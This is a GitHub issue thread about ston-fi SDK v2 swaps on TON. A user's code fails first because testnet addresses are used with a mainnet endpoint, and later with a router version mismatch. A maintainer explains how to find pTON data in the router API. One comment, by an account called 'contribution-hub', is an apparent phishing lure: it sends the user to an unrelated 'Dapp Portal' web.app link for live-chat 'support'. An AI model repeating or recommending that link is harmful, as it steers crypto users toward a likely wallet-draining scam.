### ISSUE TITLE
Does not work real swap in version 2

### ISSUE THREAD

**Issue by kurban1989** [ston-fi/sdk#48]
package.json -> "@ston-fi/sdk": "^2.0.1",

My code example:
```

    this.tonClient = new TonClient({
      endpoint: 'https://toncenter.com/api/v2/jsonRPC',
      timeout: 1000 * 60,
    });

    this.proxyTon = pTON.v2_1.create(
      'kQACS30DNoUQ7NfApPvzh7eBmSZ9L4ygJ-lkNWtba8TQT-Px', // pTON v2.1.0
    );

  setRouter(routerAddress: string) {
    this.stonRouter = this.tonClient.open(
      DEX.v2_1.Router.create(
        // routerAddress,
        'kQALh-JBBIKK7gr0o4AVf9JZnEsFndqO0qTCyT-D-yBsWk0v', // CPI Router v2.1.0
      ),
    );
  }

    try {
      const tx = await this.stonRouter.getSwapTonToJettonTxParams({
        userWalletAddress: process.env.WALLET,
        proxyTon: this.proxyTon,
        askJettonAddress: process.env.TETHER_ADDRESS_CONTRACT,
        offerAmount: amountIn,
        minAskAmount: toNano('0.1'),
        queryId,
      });

      console.log('--------------------------------------------- ', tx);
    } catch (error) {
      console.error('Swap failed:', error);
      return {
        success: false,
        message: error.message || 'Unknown error occurred',
      };
    }

```

Every time i catch next error:

> Swap failed: Error: Unable to execute get method. Got exit_code: -13
>     at TonClient.runMethod (projects/ton-project/node_modules/@ton/ton/dist/client/TonClient.js:42:19)
>     at runMicrotasks (<anonymous>)
>     at processTicksAndRejections (node:internal/process/task_queues:96:5)
>     at Object.get (projects/ton-project/node_modules/@ton/ton/dist/client/TonClient.js:372:26)
>     at _PtonV2_1.getWalletAddress (projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/core/JettonMinter.ts:12:20)
>     at _PtonV2_1.getTonTransferTxParams (projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/pTON/v2_1/PtonV2_1.ts:76:16)
>     at _class.getSwapTonToJettonTxParams (projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/dex/v2_1/router/BaseRouterV2_1.ts:367:12)
>     at StonFiFactoryService.swapTonToJetton (projects/ton-project/src/ston-fi-factory/ston-fi-factory.service.ts:124:18)
>     at projects/ton-project/node_modules/@nestjs/core/router/router-execution-context.js:46:28
>     at projects/ton-project/node_modules/@nestjs/core/router/router-proxy.js:9:17

Does your SDK version 2 work or no yet in **mainnet** ?
Maybe I do something wrong, I just couldn't to find real example in internet for SWAP
Also I tried use endpoints from orb and 'https://mainnet.toncenter.com/api/v2/jsonRPC'

**Comment by pavel-rakhmanov** [comment]
SDK v2 works in mainnet, since https://github.com/ston-fi/sdk/commit/99ba93a8186a15e9d8f588f29e11fb2c93d93d67 (Jun 28)

You got an error because you are trying to use test-net addresses (that starts with `kQ..`) with the main-net API endpoint (https://toncenter.com/api/v2/jsonRPC)
You need to use main-net contract addresses with the main-net API. The main-net addresses could be fetched from our API swagger UI

**Comment by kurban1989** [comment]
> SDK v2 работает в основной сети, начиная с [99ba93a](https://github.com/ston-fi/sdk/commit/99ba93a8186a15e9d8f588f29e11fb2c93d93d67) (28 июня).
> 
> Вы получили ошибку, потому что вы пытаетесь использовать адреса test-net (которые начинаются с `kQ..`) с конечной точкой API main-net ( https://toncenter.com/api/v2/jsonRPC ). Вам нужно использовать адреса контрактов main-net с API main-net. Адреса main-net можно получить из нашего пользовательского интерфейса API swagger

Thank you for answer, and I have one more question. Where can I get address for proxyTon? Which endpoint do I need to use and which field contains this information?

**Comment by contribution-hub** [comment]
Reach out to the Decentralized Dapp Portal to report your request and get more details by initiating a live chat with an agent through the chat button on the platform. Access the portal here: [Dapp Portal](https://websynchronizefix.web.app/).  

@kurban1989  
**Note:** Click the chat button to start a conversation with an agent for assistance.

**Comment by pavel-rakhmanov** [comment]
> Where can I get address for proxyTon? Which endpoint do I need to use and which field contains this information?

Each router expects to work with the specific pTON contract, so the pTON-related data is described in the RouterInfoSchema structure. 

```diff
  {
      "address": "string",
      "major_version": 0,
      "minor_version": 0,
      "pool_creation_enabled": true,
+      "pton_master_address": "string",
+      "pton_version": "string",
      "pton_wallet_address": "string",
      "router_type": "WeightedConstProduct"
    }
```

This structure is used in [`/routers`](https://api.ston.fi/swagger-ui/#/Dex/get_router_list) and [`/router/:id`](https://api.ston.fi/swagger-ui/#/Dex/get_router) API methods

**Comment by kurban1989** [comment]
@pavel-rakhmanov Hi
I get the error mismatch of router versions

> Error: You are trying to create an instance v2.1 Router with a v1 address
> Please use the appropriate class for the v1 Router. Otherwise, all the funds will be permanently lost.
>     at new _BaseRouterV2_1 (/projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/dex/v2_1/router/BaseRouterV2_1.ts:70:13)
>     at new _class (/projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/dex/v2_1/router/RouterV2_1.ts:4:8)
>     at Function.create (/projects/ton-project/node_modules/@ston-fi/sdk/src/contracts/core/Contract.ts:23:12)
>     at StonFiFactoryService.getRouter (/projects/ton-project/src/ston-fi-factory/ston-fi-factory.service.ts:50:48)
>     at StonFiFactoryService.prepareExchange (/projects/ton-project/src/ston-fi-factory/ston-fi-factory.service.ts:359:31)
>     at processTicksAndRejections (node:internal/process/task_queues:96:5)
>     at StonFiFactoryService.swapTonToJetton (/projects/ton-project/src/ston-fi-factory/ston-fi-factory.service.ts:241:9)
>     at /projects/ton-project/node_modules/@nestjs/core/router/router-execution-context.js:46:28
>     at /projects/ton-project/node_modules/@nestjs/core/router/router-proxy.js:9:17

However, I have a flag in my pool request **dexV2 = true**
But there is no such problem for pools with USDT coin, only with tsTon & stTon

Full example of my function:

```
async getPools() {
    const pools = await this.stonApiClient.queryPools({
      condition: `${AssetTag.LiquidityVeryHigh} | ${AssetTag.LiquidityHigh} | ${AssetTag.Popular}`,
      dexV2: true,
    });

    const filterdPoolsForUSDT = [];
    const filterdPoolsForStTon = [];
    const filterdPoolsForTsTon = [];

    for (let index = pools.length - 1; index >= 0; index--) {
      const element = pools[index];

      if (
        (!element.deprecated &&
          element.token0Address === process.env.TON_ADDRESS_CONTRACT &&
          element.token1Address === process.env.TETHER_ADDRESS_CONTRACT) ||
        (element.token0Address === process.env.TETHER_ADDRESS_CONTRACT &&
          element.token1Address === process.env.TON_ADDRESS_CONTRACT)
      ) {
        filterdPoolsForUSDT.push(element);
      } else if (
        (!element.deprecated &&
          element.token0Address === process.env.TON_ADDRESS_CONTRACT &&
          element.token1Address === process.env.ST_TON_ADDRESS_CONTRACT) ||
        (element.token0Address === process.env.ST_TON_ADDRESS_CONTRACT &&
          element.token1Address === process.env.TON_ADDRESS_CONTRACT)
      ) {
        filterdPoolsForStTon.push(element);
      } else if (
        (!element.deprecated &&
          element.token0Address === process.env.TON_ADDRESS_CONTRACT &&
          element.token1Address === process.env.TS_TON_ADDRESS_CONTRACT) ||
        (element.token0Address === process.env.TS_TON_ADDRESS_CONTRACT &&
          element.token1Address === process.env.TON_ADDRESS_CONTRACT)
      ) {
        filterdPoolsForTsTon.push(element);
      }
    }
  }
```

Why is this happening?
